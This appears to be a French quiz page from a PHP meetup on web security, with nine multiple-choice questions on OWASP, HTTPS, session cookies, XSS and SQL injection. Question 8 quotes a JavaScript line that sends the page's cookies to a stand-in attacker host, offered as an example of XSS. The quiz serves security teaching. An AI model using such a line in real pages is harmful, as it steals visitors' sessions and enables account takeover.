PHP Tours Meetup #27 Sécurité et vulnérabilités Web

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

University - Professional Development

9 Qs

quiz-placeholder

Similar activities

Objets connectés

Objets connectés

Professional Development

10 Qs

oPglpfQqtYif38V/piby13xVnvLFKIjxnkglzgl1XQLC5gpaHRQO4MCDrMh45ek8

oPglpfQqtYif38V/piby13xVnvLFKIjxnkglzgl1XQLC5gpaHRQO4MCDrMh45ek8

University

10 Qs

PHP Tours Meetup #22 (Super Apéro)

PHP Tours Meetup #22 (Super Apéro)

University - Professional Development

10 Qs

Flusk Vault Release

Flusk Vault Release

Professional Development

8 Qs

Métiers de l'informatique 2

Métiers de l'informatique 2

Professional Development

6 Qs

Sécurité

Sécurité

University

8 Qs

Quiz Organisation analyse d'un SoC

Quiz Organisation analyse d'un SoC

University

10 Qs

Quiz Cybersécurité

Quiz Cybersécurité

Professional Development

10 Qs

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

Assessment

Quiz

Computers

University - Professional Development

Medium

Created by

Tours AFUP

Used 4+ times

FREE Resource

9 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

30 sec • Ungraded

(Question Gratuite) A propos de la conférence de ce soir:

J'ai appris beaucoup de choses cools!

Ca m'a permis de réviser mes connaisances!

Je connaissais déjà tout!

Je viens voir les organisateurs pour faire la prochaine conférence sur la sécurité!

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que signifie l'acronyme "OWASP" ?

Organisation for World Acknowledgment of Security Principle

Of Web And Security Policy

Open Web Application Security Project

Omega Werewolf And the Super Poney

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Quelle est la catégorie placée en haut du TOP 10 de l'OWASP (version 2021) ?

Contrôles d'accès défaillants

Mauvaise configuration de sécurité

Identification et authentification de mauvaise qualité

Supervision et Journalisation Insuffisantes

4.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Si je navigue sur un site en HTTPS je suis 100% à l'abri de tout piratage.

Vrai

Faux

5.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Il peut suffire d'un cookie de session pour accéder au compte d'une personne sans connaître ses identifiants (login/mot de passe)

Vrai

Faux

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Laquelle de ces mesures N'aiderait PAS à limiter la possibilité d'un vol de cookie ?

Utiliser l'attribut "HttpOnly"

Limiter la durée de vie des cookies

Filtrer les données soumises par les utilisateurs avant de les stocker

Imposer un changement de mot de passe tous les mois

7.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Il n'y a que par le biais des sites Web que l'ont peut se faire pirater

Vrai

Faux

8.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

> (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

La ligne de code ci-dessus est typique d'une attaque de type:

Injection SQL

Cross-site scripting (XSS)

Brute force

Man in the middle

9.

MULTIPLE CHOICE QUESTION

30 sec • Ungraded

Quelle est, pour vous, la meilleure proposition pour éviter les failles de type "injection SQL" ?

Utiliser une base NoSQL

Ne pas mettre de formulaire sur son site

Utiliser un ORM pour gérer les requêtes à la base

Venir aux meetup de l'AFUP sur la sécurité